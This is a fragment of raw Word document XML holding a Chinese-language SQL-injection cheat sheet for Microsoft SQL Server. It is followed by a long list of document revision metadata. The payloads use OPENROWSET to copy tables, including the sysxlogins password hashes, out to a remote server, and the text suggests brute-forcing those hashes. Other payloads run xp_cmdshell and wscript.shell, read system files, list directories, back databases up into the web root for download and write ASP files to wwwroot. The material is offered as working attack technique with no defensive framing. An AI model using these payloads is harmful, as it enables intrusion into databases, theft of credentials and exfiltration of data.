        <w:t>insert</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>所有远程表到本地表。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>基本语法：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=123', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'select * from table1') select * from table2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>这行语句将目标主机上</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>table2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表中的所有数据复制到远程数据库中的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>table1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表中。实际运用中适当修改连接字符串的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>地址和端口，指向需要的地方，比如：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/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table1') select * from table2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_sysdatabases') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from master.dbo.sysdatabases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_sysobjects') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from user_database.dbo.sysobjects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_syscolumns') </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>select * from user_database.dbo.syscolumns </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>复制数据库：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>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table1') select * from database..table1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>OPENROWSET('SQLOLEDB','uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>* from table2') select * from database..table2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>复制</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>哈西表</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>HASH</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）登录密码的</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>存储于</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>sysxlogins</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>中。方法如下：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert into OPENROWSET('SQLOLEDB', </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>'uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;','select * from </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>_sysxlogins') select * from database.dbo.sysxlogins </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>之后，就可以进行暴力破解。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>遍历目录的方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>先创建一个临时表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>temp </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';create table temp(id nvarchar(255),num1 nvarchar(255),num2 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>nvarchar(255),num3 nvarchar(255));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">';insert temp exec master.dbo.xp_availablemedia;-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得当前所有驱动器</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">';insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得子目录列表</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>获得所有子目录的目录树结构</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>并寸入</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>temp</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>表中</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id) exec master.dbo.xp_cmdshell 'type </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t xml:space="preserve">c:\web\index.asp';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>查看某个文件的内容</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id) exec master.dbo.xp_cmdshell 'cscript </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>';insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>适用权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>写入表：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('sysadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('serveradmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('setupadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('securityadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('securityadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('diskadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_SRVROLEMEMBER('bulkadmin'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>语句</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>and 1=(Select IS_MEMBER('db_owner'));-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>把路径写到表中去：</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;create table dirs(paths varchar(100), id int)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;insert dirs exec master.dbo.xp_dirtree 'c:\'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 paths from dirs)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 paths from dirs where paths not in('@Inetpub'))-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;create table dirs1(paths varchar(100), id int)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;insert dirs exec master.dbo.xp_dirtree 'e:\web'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0&lt;&gt;(select top 1 paths from dirs1)-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>把数据库备份到网页目录：下载</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>;declare @a sysname; set @a=db_name();backup database @a to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>disk='e:\web\down.bak';-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xtype=char(85)) T order by id desc) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 1=(Select Top 1 col_name(object_id('USER_LOGIN'),1) from sysobjects) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>参看相关表。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:lastRenderedPageBreak/>
        <w:t>and 1=(select user_id from USER_LOGIN) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>and 0=(select user from USER_LOGIN where user&gt;1) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>-=- wscript.shell example -=- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oacreate 'wscript.shell', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'run', NULL, 'notepad.exe' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'; declare @o int exec sp_oacreate 'wscript.shell', @o out exec </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>sp_oamethod @o, 'run', NULL, 'notepad.exe'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int, @f int, @t int, @ret int </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @line varchar(8000) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oacreate 'scripting.filesystemobject', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec @ret = sp_oamethod @f, 'readline', @line out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>while( @ret = 0 ) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>begin </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>print @line </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec @ret = sp_oamethod @f, 'readline', @line out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>end </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int, @f int, @t int, @ret int </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oacreate 'scripting.filesystemobject', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'createtextfile', @f out, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'c:\inetpub\wwwroot\foo.asp', 1 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec @ret = sp_oamethod @f, 'writeline', NULL, </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>declare @o int, @ret int </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oacreate 'speech.voicetext', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oasetproperty @o, 'speed', 150 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>to,us', 528 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>waitfor delay '00:00:05' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>'; declare @o int, @ret int exec sp_oacreate 'speech.voicetext', @o out </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec sp_oamethod @o, 'register', NULL, 'foo', 'bar' exec sp_oasetproperty </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>@o, 'speed', 150 exec sp_oamethod @o, 'speak', NULL, 'all your sequel </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>servers are belong to us', 528 waitfor delay '00:00:05'-- </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>适用权限</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>PUBLIC </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>exec master.dbo.xp_dirtree 'c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>返回的信息有两个字段</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>subdirectory</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>depth</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>Subdirectory</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段是字符型，</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>depth</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>字段是整形字段。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>create table dirs(paths varchar(100), id int) </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>建表，这里建的表是和上面</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>xp_dirtree</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>相</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>关连</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>，字段相等、类型相同。</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
        <w:t>insert dirs exec master.dbo.xp_dirtree 'c:\' </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>只要</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>我们建表与</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>存储进程返回的字段相定义相等就能够执行！</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>达到写表的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>效果</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1794">
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>一</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001F1794">
        <w:t>步步达到我们想要的信息！</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001F1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0E"/>
    <w:rsid w:val="000017DB"/>
    <w:rsid w:val="0002030A"/>
    <w:rsid w:val="00032696"/>
    <w:rsid w:val="0007493E"/>
    <w:rsid w:val="00075D38"/>
    <w:rsid w:val="00083AF7"/>
    <w:rsid w:val="00090825"/>
    <w:rsid w:val="000B119B"/>
    <w:rsid w:val="000C18C3"/>
    <w:rsid w:val="000D11A7"/>
    <w:rsid w:val="000D77E7"/>
    <w:rsid w:val="000E0B5F"/>
    <w:rsid w:val="000E1C96"/>
    <w:rsid w:val="000E2284"/>
    <w:rsid w:val="00100454"/>
    <w:rsid w:val="00170DAF"/>
    <w:rsid w:val="00177B4B"/>
    <w:rsid w:val="00190E58"/>
    <w:rsid w:val="00196A8A"/>
    <w:rsid w:val="001B6552"/>
    <w:rsid w:val="001C0A3C"/>
    <w:rsid w:val="001F1794"/>
    <w:rsid w:val="001F417E"/>
    <w:rsid w:val="00200DA2"/>
    <w:rsid w:val="002030C0"/>
    <w:rsid w:val="00206EBD"/>
    <w:rsid w:val="002118F4"/>
    <w:rsid w:val="0021538B"/>
    <w:rsid w:val="00251714"/>
    <w:rsid w:val="00296611"/>
    <w:rsid w:val="002A3564"/>
    <w:rsid w:val="002A68D8"/>
    <w:rsid w:val="002C0BD3"/>
    <w:rsid w:val="002C620C"/>
    <w:rsid w:val="002E5D73"/>
    <w:rsid w:val="00301C3C"/>
    <w:rsid w:val="00307A5D"/>
    <w:rsid w:val="00335ABF"/>
    <w:rsid w:val="003423F0"/>
    <w:rsid w:val="00347ECA"/>
    <w:rsid w:val="00354493"/>
    <w:rsid w:val="00370DF6"/>
    <w:rsid w:val="00373C1E"/>
    <w:rsid w:val="00385607"/>
    <w:rsid w:val="003954A5"/>
    <w:rsid w:val="003C67F8"/>
    <w:rsid w:val="003D29F7"/>
    <w:rsid w:val="003E7894"/>
    <w:rsid w:val="00422F73"/>
    <w:rsid w:val="004553A2"/>
    <w:rsid w:val="004632A0"/>
    <w:rsid w:val="00475772"/>
    <w:rsid w:val="00493B1E"/>
    <w:rsid w:val="004A6471"/>
    <w:rsid w:val="004B26F5"/>
    <w:rsid w:val="004C5E5B"/>
    <w:rsid w:val="004C5EEB"/>
    <w:rsid w:val="004C7843"/>
    <w:rsid w:val="004F2D95"/>
    <w:rsid w:val="00526403"/>
    <w:rsid w:val="00536895"/>
    <w:rsid w:val="00540E37"/>
    <w:rsid w:val="005568E8"/>
    <w:rsid w:val="00564EAC"/>
    <w:rsid w:val="00571507"/>
    <w:rsid w:val="005759AB"/>
    <w:rsid w:val="00593E5B"/>
    <w:rsid w:val="005A077A"/>
    <w:rsid w:val="005A605C"/>
    <w:rsid w:val="005F0378"/>
    <w:rsid w:val="00607A7F"/>
    <w:rsid w:val="00634C12"/>
    <w:rsid w:val="00645658"/>
    <w:rsid w:val="00662861"/>
    <w:rsid w:val="00666D3C"/>
    <w:rsid w:val="0069082E"/>
    <w:rsid w:val="006B6E0C"/>
    <w:rsid w:val="006D4FDC"/>
    <w:rsid w:val="006F22A9"/>
    <w:rsid w:val="00713B2A"/>
    <w:rsid w:val="00714C1E"/>
    <w:rsid w:val="00724B37"/>
    <w:rsid w:val="00736E27"/>
    <w:rsid w:val="00792B3A"/>
    <w:rsid w:val="00795564"/>
    <w:rsid w:val="007B3CED"/>
    <w:rsid w:val="007B61FE"/>
    <w:rsid w:val="007C0B32"/>
    <w:rsid w:val="007D04C2"/>
    <w:rsid w:val="007D0DF5"/>
    <w:rsid w:val="007D28AC"/>
    <w:rsid w:val="007F1155"/>
    <w:rsid w:val="007F68AF"/>
    <w:rsid w:val="00801AB7"/>
    <w:rsid w:val="008030B2"/>
    <w:rsid w:val="00810219"/>
    <w:rsid w:val="00810855"/>
    <w:rsid w:val="0081349E"/>
    <w:rsid w:val="00852742"/>
    <w:rsid w:val="0086251D"/>
    <w:rsid w:val="00864209"/>
    <w:rsid w:val="00897831"/>
    <w:rsid w:val="008A7A28"/>
    <w:rsid w:val="008B4555"/>
    <w:rsid w:val="008D01D3"/>
    <w:rsid w:val="008D7FEE"/>
    <w:rsid w:val="008F7543"/>
    <w:rsid w:val="00925194"/>
    <w:rsid w:val="00931D93"/>
    <w:rsid w:val="00941069"/>
    <w:rsid w:val="00963DD5"/>
    <w:rsid w:val="009722F4"/>
    <w:rsid w:val="00977EEF"/>
    <w:rsid w:val="00996EF2"/>
    <w:rsid w:val="00997B59"/>
    <w:rsid w:val="009B0DF1"/>
    <w:rsid w:val="009D1BE5"/>
    <w:rsid w:val="009E6030"/>
    <w:rsid w:val="009F413E"/>
    <w:rsid w:val="009F6B6D"/>
    <w:rsid w:val="00A26E25"/>
    <w:rsid w:val="00A27D77"/>
    <w:rsid w:val="00A36046"/>
    <w:rsid w:val="00A45478"/>
    <w:rsid w:val="00A57454"/>
    <w:rsid w:val="00A668AD"/>
    <w:rsid w:val="00A845CC"/>
    <w:rsid w:val="00A94636"/>
    <w:rsid w:val="00AC4378"/>
    <w:rsid w:val="00AD3C0E"/>
    <w:rsid w:val="00B03205"/>
    <w:rsid w:val="00B04F31"/>
    <w:rsid w:val="00B053B9"/>
    <w:rsid w:val="00B16990"/>
    <w:rsid w:val="00B2310F"/>
    <w:rsid w:val="00B32AE4"/>
    <w:rsid w:val="00B512EF"/>
    <w:rsid w:val="00B81C7B"/>
    <w:rsid w:val="00B87F80"/>
    <w:rsid w:val="00B92A7B"/>
    <w:rsid w:val="00B93716"/>
    <w:rsid w:val="00BB5C68"/>
    <w:rsid w:val="00BD24E0"/>
    <w:rsid w:val="00BF4C9A"/>
    <w:rsid w:val="00C14854"/>
    <w:rsid w:val="00C24970"/>
    <w:rsid w:val="00C3074F"/>
    <w:rsid w:val="00C61B92"/>
    <w:rsid w:val="00C80B93"/>
    <w:rsid w:val="00C96C3E"/>
    <w:rsid w:val="00CA7443"/>
    <w:rsid w:val="00CD134B"/>
    <w:rsid w:val="00CD4586"/>
    <w:rsid w:val="00CD495F"/>
    <w:rsid w:val="00CE7DB1"/>
